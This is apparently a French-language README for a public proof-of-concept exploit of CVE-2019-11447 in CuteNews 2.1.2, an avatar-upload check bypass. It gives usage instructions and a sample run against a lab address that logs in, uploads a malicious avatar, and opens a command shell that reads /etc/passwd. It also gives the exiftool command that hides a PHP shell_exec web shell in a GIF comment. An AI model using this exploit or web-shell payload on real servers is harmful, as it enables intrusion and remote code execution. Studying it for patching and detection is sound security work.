
CuteNews 2.1.2 - Preuve de concept CVE-2019-11447
CuteNews 2.1.2 - Preuve de concept de CVE-2019-11447
POC par CRFSlick, découvert par AkkuS <Özkan Mustafa Akkuş>
Un problème a été découvert dans CutePHP CuteNews 2.1.2. Un attaquant peut infiltrer le serveur via le processus de téléchargement d'avatar dans la zone de profil en utilisant le champ avatar_file vers index.php?mod=main&opt=personal. Il n'y a aucun contrôle efficace de $imgsize dans /core/modules/dashboard.php. Le contenu de l'en-tête d'un fichier peut être modifié et le contrôle peut être contourné pour exécuter du code. (Un attaquant peut utiliser l'en-tête GIF pour cela.)
Usage:
CVE-2019-1144.py <username> <password> <base uri / login page>
Example:
CVE-2019-1144.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ python3 CVE-2019-11447.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
-.-. --- --- .-.. .... ....- -..- --- .-. -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as admin:p4ssw0rd
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: 45ad06a9fc89f75e7ef046a11079c33d-admin
[+] __signature_dsi: 71e41d6500f2dc51d0606f64539f84b1
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.1.19/CuteNews/uploads/avatar_admin_5629.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR
$> whoami
www-data
$> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Le GIF malveillant a été récupéré sur Internet puis modifié avec exiftool afin d'insérer le PHP nécessaire
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool -Comment='<?php echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3RhcnRzaGVyZQ==\n\n\n"'"; echo shell_exec($_GET["'"cmd"'"]); echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0ZW5kc2hlcmU=\n\n"'";?>' sad.gif
Exiftool affichera les métadonnées de l'image dans lesquelles vous trouverez le code PHP inséré dans le commentaire
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool sad.gif
ExifTool Version Number : 12.05
File Name : sad.gif
...
Comment : <?php echo "\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3R...
Ce projet est destiné uniquement à des fins éducatives et ne peut être utilisé pour enfreindre la loi ou pour un gain personnel. L'auteur de ce projet n'est pas responsable des éventuels dommages causés par les informations fournies.